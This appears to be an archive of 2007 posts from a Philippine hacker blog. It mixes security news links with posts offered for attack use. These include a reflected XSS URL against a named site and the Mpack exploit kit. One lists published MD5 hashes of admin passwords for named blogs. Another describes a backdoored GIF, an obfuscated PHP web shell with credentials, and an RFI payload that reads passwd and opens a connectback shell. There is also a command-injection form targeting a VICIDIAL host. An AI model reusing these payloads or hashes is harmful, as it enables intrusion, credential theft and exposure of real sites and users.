[Ah ok, so the law we passed is not good enough :) ]

Tuta nga ba?

FREE BEER!!!

2007-10-22T17:09:00.000+08:00

http://arstechnica.com/news.ars/post/20071019-brewery-offers-lifetime-supply-of-beer-in-return-for-stolen-laptop.html

"In an attempt to get the laptop back, the brewery is offering a somewhat unusual reward: a lifetime supply of free beer. Whoever fingers the thief will get a 12-pack per month (a bit skimpy, perhaps) for the rest of their days, according to the BBC."

Sun Cellular giving free phones to hackers...

2007-10-01T19:15:00.000+08:00

Got this from a source who refused to be named...

http://suncellular.com.ph/phoneSpecs.aspx?cid=30

Multiplicity

2007-09-21T21:51:00.000+08:00

One of the more interesting stories to hit the net recently..

http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/
http://www.theregister.co.uk/2001/07/05/max_vision_begins_18month_term/

Yet another example of the blurring of the line betwen "good" and "bad" hackers.

"... Butler is known for his expertise in intrusion detection: the science of automatically analyzing Internet traffic for "signatures" indicative of an attack. Butler remains well-regarded among many security experts for creating and maintaining arachNIDS, a free, up-to-date catalog of attack signatures at WhiteHats.com."

"King of the Carders
Authorities' account of Butler fleshes out a dichotomy between
ultra-secretive paranoia and a careless brazenness that in many ways
mirrors the carder culture Butler sought to lead."

Personally, I like the way he used different handles to mislead the authorities.

Store p0rn on a government computer

2007-09-10T14:56:00.000+08:00

Philippine Information Agency Intranets provide a handy file storage service to those who know how to get pass the authentication. Interestingly enough this bug does not seem to be found on other WebExplorer Lite v2.12 applications out in the internet.

Scare Tactics

2007-09-10T14:50:00.000+08:00

As is so typical in the cybersecurity industry today we have conferences where suppliers buy the rights to scare the attendees into buying their products. Welcome to ManilaCon 2k7! Don't get conned.

CISSP XSS

2007-07-18T13:03:00.001+08:00

http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Yehey,%20CISSP%20na%20ko!%22)%3C/script%3E&c=184845

Mpack 0.90

2007-07-16T16:36:00.000+08:00

Just for educational purposes here's a copy of Mpack v0.90. More info on Mpack may be found here

Intellicare SMS service vulnerability

2007-07-08T17:23:00.000+08:00

Intellicare is a health maintenance organization (HMO) engaged in the delivery of managed healthcare services. As part of their service to customers they have installed a web based sms portal. This sms service can be remotely compromised and medical information about clients disclosed. It can also be used to send and receive "unauthorized" sms as well.

The Athens Affair

2007-07-01T17:14:00.000+08:00

http://www.spectrum.ieee.org/print/5280

A very nice article about the cellphone wiretapping case in greece. Personally I think it's the NSA, CIA :)

Tech Blogs MD5 hashes

2007-05-28T11:03:00.000+08:00

Some Filipino tech oriented blogs and the corresponding md5 hashes of the admin password.

http://www.yugatech.com/ - 30ae4352335c35041112831001a003b0

racoma.com.ph - 89098df6a236127d6f446d9d2e910e3c

http://www.pinoytechblog.com/ - 2a5de4f53b1317f7e36afcdb6b5202a4

paraz.com - fcbc1aa786f6861d1239e144564d8d42

pinoygeek.org - 2bd96487449f461306e6de359bd7e109

Not a tech blog...

http://www.philippineblogawards.com.ph/ - f160178aac7f797e0aafa8f86bd61c5a

Some PHP Tools

2007-05-26T21:29:00.000+08:00

sujiru.googlepages.com/kidlat.gif - a working gif with php backdoor embedded. Useful for sites with a local file inclusion vulnerability and accepts only picture uploads.

Sujiru.php - r57 php shell ver 1.31. The original release was backdoored. They were removed from this file. The code was also obfuscated to frustrate casual examination by anyone finding and reading the file. User:sujiru Pass:akoaymaylobo. You can change the values declared in the file. Also available in .txt

Payload.php - Used primarily for RFI. Gives info about the host, reads the passwd file, looks for interesting files in the webroot. Automatically writes the above php shell in two locations, the first and last writeable directories it finds relative to the vulnerable script. Tries to establish a connectback shell to a host you specify. You can specify the host by using file.php?ip= or by editing the $ip variable. Also mails information. Note:Didn't have the time to clean the code, but everything works. Also available in .txt

Cisco FTP Vulnerability

2007-05-23T22:28:00.000+08:00

Timeline:

May 9, 2007 - Cisco announce vulnerability

May 11, 2007 - Cisco says FTP vulnerability may provide hacker backdoor

May 15, 2007 - Some dispute the "backdoor" scenario

May 16, 2007 - Report about major cisco outage in Japan.

VICIDIAL Vulnerability

2007-05-20T02:34:00.000+08:00

VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.

More information could be found at http://astguiclient.sourceforge.net/vicidial.html

Exploiting..

On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.

Once we have a valid username and password we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like

<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>

Change the host and directory if needed and save as an .htm file. Spaces would appear to be filtered

OpenKiosk Nodeview DoS

2007-05-14T14:02:00.000+08:00

OpenKiosk, a Filipino made open source kiosk software, includes Nodeview as the server component. Nodeview is vulnerabe to a Denial of Service attack. By connecting to port 10012 of the machine running Nodeview using netcat or telnet and entering any character, a space, another character and pressing enter, an error is triggered in the qtcore4.dll. Port 10012 is used by a mini webserver accepting xmlrpc POST requests.